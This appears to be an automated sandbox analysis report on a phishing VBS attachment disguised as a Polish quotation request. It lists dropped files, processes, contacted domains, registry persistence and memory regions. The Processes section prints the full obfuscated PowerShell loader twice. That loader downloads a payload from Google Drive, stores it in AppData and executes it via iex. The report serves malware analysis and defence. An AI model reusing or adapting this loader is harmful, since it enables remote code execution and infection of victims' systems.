Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Zapytanie ofertowe (GASTRON 07022024).vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0svqftf5.b3a.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_affrgltk.dn1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1zfskfq.mda.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1edl1gs.ljq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Veinless.Dis
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren
Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate
Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe
Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11
Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy
Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For(
$Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke(
$Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens
'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds
Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens
'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle
D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK
XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens
',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV
eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U
dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U.
');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH
rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P
IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu
or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen=
(Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus
FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist
(Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB
BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB
pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist
(Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es
Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML
aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS
GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B
P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW
l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$
CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist
(Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$
SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm
Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr(
I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS
a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim
Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU
,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist
$Vildtjagternes;"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren
Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate
Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe
Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11
Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy
Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For(
$Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke(
$Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens
'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds
Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens
'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle
D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK
XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens
',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV
eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U
dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U.
');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH
rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P
IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu
or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen=
(Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus
FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist
(Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB
BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB
pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist
(Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es
Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML
aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS
GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B
P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW
l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$
CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist
(Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$
SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm
Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr(
I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS
a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim
Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU
,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist
$Vildtjagternes;"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe
|
"C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"
|
||
C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe
|
"C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
|
||
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://nuget.org/NuGet.exe
|
unknown
|
||
http://drive.usercontent.google.com
|
unknown
|
||
http://mail.fiszebrandt.pl
|
unknown
|
||
https://drive.goog
|
unknown
|
||
https://drive.google.com/y
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://drive.google.com/uc?ex
|
unknown
|
||
https://drive.google.com/u
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://drive.googPz
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://drive.usercontent.googh
|
unknown
|
||
http://r10.o.lencr.org0#
|
unknown
|
||
http://drive.google.com
|
unknown
|
||
https://drive.google.
|
unknown
|
||
https://drive.go
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://drive.goo
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://drive.g
|
unknown
|
||
http://crl.microsoftg
|
unknown
|
||
https://drive.google.com/uc
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://drive.google.com/
|
unknown
|
||
http://x1.c.lencr.org/0
|
unknown
|
||
http://x1.i.lencr.org/0
|
unknown
|
||
https://drive.googl
|
unknown
|
||
https://drive.google.com/uc?e
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://drive.google.com
|
unknown
|
||
https://drive.usercontent.google.com
|
unknown
|
||
https://drive.google.c
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
https://drive.google.com/uc?
|
unknown
|
||
http://fiszebrandt.pl
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://r10.i.lencr.org/0
|
unknown
|
||
https://drive.google
|
unknown
|
||
https://drive.google.co
|
unknown
|
There are 33 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
fiszebrandt.pl
|
195.128.154.10
|
||
mail.fiszebrandt.pl
|
unknown
|
||
drive.google.com
|
142.250.185.174
|
||
drive.usercontent.google.com
|
142.250.74.193
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
195.128.154.10
|
fiszebrandt.pl
|
Poland
|
||
142.250.185.174
|
drive.google.com
|
United States
|
||
142.250.74.193
|
drive.usercontent.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
fMNDB
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 12 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2303A000
|
trusted library allocation
|
page read and write
|
||
56CA000
|
trusted library allocation
|
page read and write
|
||
16B68565000
|
trusted library allocation
|
page read and write
|
||
8200000
|
direct allocation
|
page execute and read and write
|
||
2300F000
|
trusted library allocation
|
page read and write
|
||
22FC1000
|
trusted library allocation
|
page read and write
|
||
96F5000
|
direct allocation
|
page execute and read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
7CB0000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
29F53744000
|
heap
|
page read and write
|
||
CF96E7F000
|
stack
|
page read and write
|
||
25160000
|
trusted library allocation
|
page read and write
|
||
435E000
|
stack
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
29F53481000
|
heap
|
page read and write
|
||
29F516C2000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
6FA0000
|
trusted library allocation
|
page read and write
|
||
B7155FF000
|
stack
|
page read and write
|
||
2FD156E000
|
stack
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
7DAD000
|
stack
|
page read and write
|
||
16B5A4AB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
6EC2D000
|
unkown
|
page read and write
|
||
59E5000
|
remote allocation
|
page execute and read and write
|
||
27CA000
|
heap
|
page read and write
|
||
277A000
|
trusted library allocation
|
page execute and read and write
|
||
6EC2D000
|
unkown
|
page read and write
|
||
2435D075000
|
heap
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
7540000
|
direct allocation
|
page read and write
|
||
16B582E1000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC104000
|
trusted library allocation
|
page read and write
|
||
7328000
|
heap
|
page read and write
|
||
256E0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
2FF4000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
16B687EE000
|
trusted library allocation
|
page read and write
|
||
28B0000
|
heap
|
page read and write
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
29F534A8000
|
heap
|
page read and write
|
||
17D000
|
unkown
|
page readonly
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
2750000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
7CAE000
|
stack
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
3200000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
69AA000
|
stack
|
page read and write
|
||
2FF3000
|
trusted library allocation
|
page execute and read and write
|
||
74D0000
|
direct allocation
|
page read and write
|
||
63E5000
|
remote allocation
|
page execute and read and write
|
||
2A267940000
|
heap
|
page read and write
|
||
29F535AD000
|
heap
|
page read and write
|
||
25220000
|
trusted library allocation
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
251A7000
|
trusted library allocation
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
22DC2000
|
trusted library allocation
|
page read and write
|
||
25320000
|
trusted library allocation
|
page read and write
|
||
16B58A2C000
|
trusted library allocation
|
page read and write
|
||
16B566B5000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
4531000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
4E6C000
|
trusted library allocation
|
page read and write
|
||
7E41000
|
heap
|
page read and write
|
||
16B589C4000
|
trusted library allocation
|
page read and write
|
||
AAF5000
|
direct allocation
|
page execute and read and write
|
||
160000
|
unkown
|
page readonly
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
6AE0000
|
heap
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
161000
|
unkown
|
page execute read
|
||
29F5366E000
|
heap
|
page read and write
|
||
7FFAAC380000
|
trusted library allocation
|
page read and write
|
||
256F0000
|
trusted library allocation
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
16B5A591000
|
trusted library allocation
|
page read and write
|
||
22B40000
|
direct allocation
|
page read and write
|
||
16B58D86000
|
trusted library allocation
|
page read and write
|
||
7FFAAC310000
|
trusted library allocation
|
page read and write
|
||
16B569A0000
|
heap
|
page read and write
|
||
2FFD000
|
trusted library allocation
|
page execute and read and write
|
||
6F60000
|
trusted library allocation
|
page read and write
|
||
16B7099F000
|
heap
|
page read and write
|
||
29F534A8000
|
heap
|
page read and write
|
||
16B5665C000
|
heap
|
page read and write
|
||
22DF0000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
2785000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC10D000
|
trusted library allocation
|
page execute and read and write
|
||
16B56650000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
7DB0000
|
trusted library allocation
|
page execute and read and write
|
||
25310000
|
trusted library allocation
|
page read and write
|
||
22C1E000
|
stack
|
page read and write
|
||
7FFAAC450000
|
trusted library allocation
|
page read and write
|
||
2782000
|
trusted library allocation
|
page read and write
|
||
2293C000
|
stack
|
page read and write
|
||
380000
|
heap
|
page read and write
|
||
82C0000
|
direct allocation
|
page read and write
|
||
29F5348C000
|
heap
|
page read and write
|
||
29F53B08000
|
heap
|
page read and write
|
||
16B5669B000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
4CD6000
|
trusted library allocation
|
page read and write
|
||
24B0000
|
heap
|
page read and write
|
||
